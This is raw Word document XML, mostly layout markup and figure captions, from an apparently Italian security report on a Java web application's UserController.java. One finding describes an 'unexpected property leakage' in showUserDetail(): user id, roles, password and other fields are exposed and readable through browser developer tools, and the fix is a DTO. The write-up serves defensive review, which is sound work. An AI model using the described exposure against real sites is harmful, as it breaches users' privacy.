                    <w:p w14:paraId="345C1A0D" w14:textId="52F81806" w:rsidR="006F4082" w:rsidRPr="00CA3E09"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18</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con vulnerabilità</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C7B11B7" wp14:editId="148177FC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6406222" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1469407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363" name="Immagin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45343"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6408420" cy="84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2EF5E" w14:textId="26BA33F5" w:rsidR="00B04DA2" w:rsidRDefault="00B04DA2" w:rsidP="002A0868">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9A8860" w14:textId="4E886BFE" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D1D4433" w14:textId="4FA5F08C" w:rsidR="006F4082" w:rsidRDefault="006F4082" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251790336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C09FA23" wp14:editId="2DAF8ACF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-186690</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>407670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6405880" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1726110007" name="Casella di testo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44C468C3" w14:textId="7D07C156"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19</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: UserController.java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FA23" id="_x0000_s1046" type="#_x0000_t202" style="position:absolute;margin-left:-14.7pt;margin-top:32.1pt;width:5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X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4+je/mcwpJis0+3k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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="44C468C3" w14:textId="7D07C156" w:rsidR="006F4082" w:rsidRPr="00BA3B53" w:rsidRDefault="006F4082" w:rsidP="006F4082">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19</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java non vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251786240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4BB303C2" wp14:editId="090B6806">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-186690</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-366395</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6405880" cy="716915"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapNone/>
            <wp:docPr id="447527117" name="Immagine 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7117" name="Immagine 8" descr="Immagine che contiene testo, Carattere, linea, schermata&#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53673"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="640588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17B76" w14:textId="6B9C6D76" w:rsidR="006F4082" w:rsidRDefault="006F4082" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750AC624" w14:textId="7906124C" w:rsidR="006F4082" w:rsidRDefault="006F4082" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AB6984E" wp14:editId="78D18311">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>149860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6452870" cy="3101340"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3810"/>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571"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6454140" cy="3101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1763B" w14:textId="2A2D340F" w:rsidR="006F4082" w:rsidRDefault="006F4082" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B30CEFE" w14:textId="102C14FE" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E608DF5" w14:textId="2922A149" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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13974C05" w14:textId="5C946B49" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A3310D" w14:textId="64303BF5" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="468C7857" w14:textId="7DFC171E" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3E9D62" w14:textId="78F8E7D0" w:rsidR="002A0868" w:rsidRDefault="006F4082" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251792384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06798999" wp14:editId="7FE220A7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>134620</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6454140" cy="635"/>
                <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1651520163" name="Casella di testo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0886733" w14:textId="4A6A2AB4"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4E2F86">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>20</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Schermata web con i campi non neces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999" id="_x0000_s1047" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:10.6pt;width:508.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d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5tNZhSSFJt/v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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="60886733" w14:textId="4A6A2AB4" w:rsidR="006F4082" w:rsidRPr="00962962"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4E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>20</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Schermata web con i campi non necessari</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="793B8B8D" w14:textId="752ACC47" w:rsidR="002A0868" w:rsidRPr="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C5A60B8" w14:textId="3999E1B9" w:rsidR="00467BBC" w:rsidRDefault="006F4082" w:rsidP="00467BBC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251794432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F7537B1" wp14:editId="7F9E1191">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-381635</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3899535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6883400" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1902320283" name="Casella di testo 1"/>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2D6B360D" w14:textId="34752FFC"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4E2F86">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>21</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Schermata web senza i campi inut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B1" id="_x0000_s1048" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-30.05pt;margin-top:307.05pt;width:5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ic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53cfxxSSFJvdfY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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2D6B360D" w14:textId="34752FFC" w:rsidR="006F4082" w:rsidRPr="002E7D33" w:rsidRDefault="006F4082" w:rsidP="006F4082">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>21</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Schermata web senza i campi inutili</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C10B41E" wp14:editId="3F1B63D5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>19558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19AC2626" w14:textId="176A4A7F" w:rsidR="00467BBC" w:rsidRDefault="00467BBC" w:rsidP="00467BBC"/>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0F59D48F" w14:textId="77777777" w:rsidR="006F4082" w:rsidRPr="00681873" w:rsidRDefault="006F4082" w:rsidP="00681873">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2559D5" w14:textId="33A9ACE0" w:rsidR="00B019CE" w:rsidRPr="00681873" w:rsidRDefault="00B019CE" w:rsidP="00681873">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00681873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Unexpected property leakage</w:t>
      </w:r>
      <w:r w:rsidR="001A56AB" w:rsidRPr="00681873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB1554B" w14:textId="29A3F51F" w:rsidR="00681873" w:rsidRDefault="00681873" w:rsidP="00B019CE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00681873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>: UserController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783483D7" w14:textId="77777777" w:rsidR="00681873" w:rsidRDefault="00681873" w:rsidP="00681873">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00681873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>: 78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459CD01D" w14:textId="5BE00672" w:rsidR="0031586D" w:rsidRDefault="00681873" w:rsidP="00681873">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa vulnerabilità riguarda il metodo </w:t>
      </w:r>
      <w:r w:rsidR="00B019CE" w:rsidRPr="00681873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>showUserDetail()</w:t>
      </w:r>
      <w:r w:rsidR="00B019CE">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00B019CE" w:rsidRPr="00681873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserController.java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dove troviamo lo </w:t>
      </w:r>
      <w:r w:rsidR="00B019CE">
        <w:t xml:space="preserve">stesso problema delle </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerabilità descritte sopra.Infatti,</w:t>
      </w:r>
      <w:r w:rsidR="00B019CE">
        <w:t xml:space="preserve"> ci sono </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nuovamente </w:t>
      </w:r>
      <w:r w:rsidR="00B019CE">
        <w:t>degli attributi superflui</w:t>
      </w:r>
      <w:r w:rsidR="00872EF7">
        <w:t xml:space="preserve"> e sono id, roles, password, testResults, hobby_matches e saved_hobbies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C608321" w14:textId="391A07D1" w:rsidR="00681873" w:rsidRDefault="00681873" w:rsidP="00681873">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA09AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BC90CB" w14:textId="5128F579" w:rsidR="00681873" w:rsidRDefault="00681873" w:rsidP="00681873">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Anche in questo caso consiste nel leggere i valori dal Web developer tool, in modo da violare la privacy dell’utente o effettuare altri attacchi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F145935" w14:textId="2C36262B" w:rsidR="00681873" w:rsidRDefault="00681873" w:rsidP="00681873">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA09AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE230BA" w14:textId="63D39F07" w:rsidR="00681873" w:rsidRDefault="00681873" w:rsidP="00681873">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sono stati rimossi gli attributi superflui tramite l’uso di una classe DTO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED84222" w14:textId="493F538D" w:rsidR="00681873" w:rsidRDefault="00681873" w:rsidP="00681873">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251796480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D75359F" wp14:editId="59A52111">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>231140</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4604385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5654040" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1585452309" name="Casella di tes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6F743E7" w14:textId="22C48E67"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2</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Schermata web con informazioni non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359F" id="_x0000_s1049" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:18.2pt;margin-top:362.55pt;width:445.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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="46F743E7" w14:textId="22C48E67" w:rsidR="00681873" w:rsidRPr="0064475E"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2</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Schermata web con informazioni non necessarie</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="165BB312" wp14:editId="02CDD134">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7493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93CF" w14:textId="3F90FF39" w:rsidR="00681873" w:rsidRDefault="00681873" w:rsidP="00681873">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A61A93" w14:textId="20DAEC8E" w:rsidR="00681873" w:rsidRDefault="00681873" w:rsidP="00681873">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318D2333" w14:textId="77777777" w:rsidR="00681873" w:rsidRDefault="00681873" w:rsidP="00681873">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="313647DC" w14:textId="77777777" w:rsidR="00681873" w:rsidRDefault="00681873" w:rsidP="00681873">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758A85C5" w14:textId="15E1B4AC" w:rsidR="00681873" w:rsidRDefault="00681873" w:rsidP="00681873">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F593019" w14:textId="7DBDCF6F" w:rsidR="00DE4795" w:rsidRPr="00B019CE" w:rsidRDefault="00DE4795" w:rsidP="00B019CE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pP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288BB1F2" w14:textId="0E046671" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4A17FD67" w14:textId="4DA35649" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4A735AF0" w14:textId="18724E7E" w:rsidR="004B30FC" w:rsidRDefault="00681873" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251798528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="743A0253" wp14:editId="2F56EF40">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>45720</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3763010</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6172200" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="2053205699" name="Casella di tes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B44FD21" w14:textId="5DB1D45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3</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Schermata web con le sole informazioni necessa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0253" id="_x0000_s1050" type="#_x0000_t202" style="position:absolute;margin-left:3.6pt;margin-top:296.3pt;width:48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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0B44FD21" w14:textId="5DB1D45E" w:rsidR="00681873" w:rsidRPr="0009392D"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3</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Schermata web con le sole informazioni necessarie</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79E47239" wp14:editId="173DE0F4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>45720</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-660400</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6AC1A" w14:textId="3DA2488A" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>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6250BBDC" w:rsidR="004B30FC" w:rsidRDefault="00681873" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251802624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E43CE79" wp14:editId="470D176C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-330835</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1144905</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6781165" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1218624812"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3F0B4B38" w14:textId="70E6EC6C"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4</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CE79" id="_x0000_s1051" type="#_x0000_t202" style="position:absolute;margin-left:-26.05pt;margin-top:90.15pt;width:533.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H0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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3F0B4B38" w14:textId="70E6EC6C" w:rsidR="00681873" w:rsidRPr="00175384" w:rsidRDefault="00681873" w:rsidP="00681873">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>24</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con metodo vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="481CFBE8" wp14:editId="29273C4C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>264795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6781165" cy="822960"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3894551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54042"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6781175" cy="82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301E4" w14:textId="59AF84AB" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="064359E7" w14:textId="56EF81FB" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0C35DEE0" w14:textId="2945222C" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="56C6D90C" w14:textId="4B519D27" w:rsidR="004B30FC" w:rsidRDefault="00CA09AC" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251804672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1506CDD1" wp14:editId="1103F307">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-339090</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1322070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6781165" cy="635"/>
